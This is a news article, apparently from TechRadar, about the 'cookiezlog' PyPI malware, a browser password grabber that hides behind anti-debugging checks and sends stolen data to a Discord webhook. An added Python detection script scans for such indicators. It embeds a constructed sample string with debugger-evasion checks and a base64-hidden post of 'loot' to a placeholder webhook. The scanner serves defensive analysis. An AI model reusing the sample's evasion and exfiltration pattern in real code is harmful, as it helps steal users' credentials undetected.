Python malware uses a sneaky new technique

Threat actors writing Python malware are getting better at it, and their payloads are becoming harder to analyze, researchers say.
While analyzing a recently discovered malicious package, JFrog reported that the attackers used a new technique, anti-debugging code, to make it harder for researchers to analyze the payload and understand the logic behind it.
In addition to the “normal” obfuscation tools and techniques, the attackers behind the “cookiezlog” package used anti-debugging code aimed at defeating dynamic analysis tools such as debuggers and sandboxes.
First time
According to JFrog, this is the first time such a method has been observed in PyPI malware.
“Most PyPI malware today tries to avoid static detection using various techniques, ranging from primitive variable mangling to sophisticated code flattening and steganography techniques,” the researchers explain in a blog entry.
“The use of these techniques makes the package extremely suspicious, but it prevents inexperienced researchers from understanding exactly how the malware works using static analysis tools. However, any dynamic analysis tool, such as a malware sandbox, quickly removes the static protective layers of the malware and reveals the underlying logic.”
The attackers’ efforts seem to have been futile, as the researchers at JFrog bypassed the anti-debugging checks and examined the payload directly. After analysis, the researchers described the payload as “disappointingly simple” compared to the effort that went into hiding it. It is still malicious, however: cookiezlog is a password grabber that steals “autocomplete” passwords stored in the local data caches of popular browsers.
The stolen data is then sent to the attackers through a Discord webhook that serves as the command-and-control channel.
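The article does not reproduce cookiezlog’s code, so the following is an added example, not the package’s payload or JFrog’s tooling. It shows what Python anti-debugging checks commonly look like (a `sys.gettrace()` test, a check for `pdb` in `sys.modules`, and a `ctypes` call to `IsDebuggerPresent`; these are generic patterns, not a claim about what cookiezlog specifically does) and a small AST-based scanner that flags those indicators together with Discord webhook URLs, including ones hidden behind a base64 layer. The sample package source it scans is constructed here for illustration, and the webhook URL in it is a placeholder.

```python
"""Flag common Python anti-debugging indicators and Discord webhook C2 URLs.

Added example: the patterns below are generic, the sample source is
constructed, and nothing here is cookiezlog's actual code.
"""
import ast
import base64
import re

# Generic anti-debugging indicators (assumed common patterns, not cookiezlog's).
ANTI_DEBUG_CALLS = {"sys.gettrace", "sys.settrace"}
ANTI_DEBUG_NAMES = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent"}
DEBUGGER_MODULES = {"pdb", "pydevd", "bdb"}

# Discord webhook URL shape: https://discord.com/api/webhooks/<id>/<token>
DISCORD_WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
)

# Constructed sample: placeholder webhook, base64-wrapped the way droppers often do.
SAMPLE_HOOK_URL = "https://discord.com/api/webhooks/123456789/abcdefghijklmno"
_ENCODED_HOOK = base64.b64encode(SAMPLE_HOOK_URL.encode()).decode()
SAMPLE_SOURCE = f'''\
import sys, ctypes, base64, requests

def _guard():
    if sys.gettrace() is not None:          # a tracer is attached: bail out
        sys.exit(0)
    if "pdb" in sys.modules:                # debugger module already loaded
        sys.exit(0)
    if ctypes.windll.kernel32.IsDebuggerPresent():
        sys.exit(0)

_guard()
HOOK = base64.b64decode("{_ENCODED_HOOK}").decode()
requests.post(HOOK, json={{"content": "loot"}})
'''


def _dotted(node):
    """Return 'a.b.c' for an attribute chain rooted at a plain name, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _maybe_b64(text):
    """Decode a base64 string constant to text, or None if it is not one."""
    try:
        return base64.b64decode(text, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_source(src):
    """Return [(line, kind, detail)] for anti-debug checks and webhook URLs."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name and (name in ANTI_DEBUG_CALLS
                         or name.rsplit(".", 1)[-1] in ANTI_DEBUG_NAMES):
                findings.append((node.lineno, "anti-debug", name))
        elif isinstance(node, ast.Compare) and any(isinstance(op, ast.In) for op in node.ops):
            left, target = node.left, node.comparators[0]
            if (isinstance(left, ast.Constant) and left.value in DEBUGGER_MODULES
                    and _dotted(target) == "sys.modules"):
                findings.append((node.lineno, "anti-debug", f"'{left.value}' in sys.modules"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Check the literal as-is, then one base64 layer beneath it.
            for text in (node.value, _maybe_b64(node.value)):
                if text and (m := DISCORD_WEBHOOK_RE.search(text)):
                    findings.append((node.lineno, "discord-webhook", m.group(0)))
                    break
    return sorted(findings)


if __name__ == "__main__":
    for line, kind, detail in scan_source(SAMPLE_SOURCE):
        print(f"line {line:>3}  {kind:<16} {detail}")
```

Run on its own the script prints three anti-debug hits and the decoded webhook. In practice a hit on `sys.gettrace` or `IsDebuggerPresent` in a package that has no business debugging itself is a strong triage signal even when the payload beneath it is trivial, which matches JFrog’s observation that the protective layers were more elaborate than what they protected.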
Unfortunately, JFrog has not disclosed the name of the group behind the malware, nor the distribution methods used to get the password grabber onto victims’ machines. Regardless, reports of PyPI malware are becoming more frequent, suggesting that Python developers have become a prime target.
https://www.techradar.com/news/python-malware-is-using-a-devious-new-technique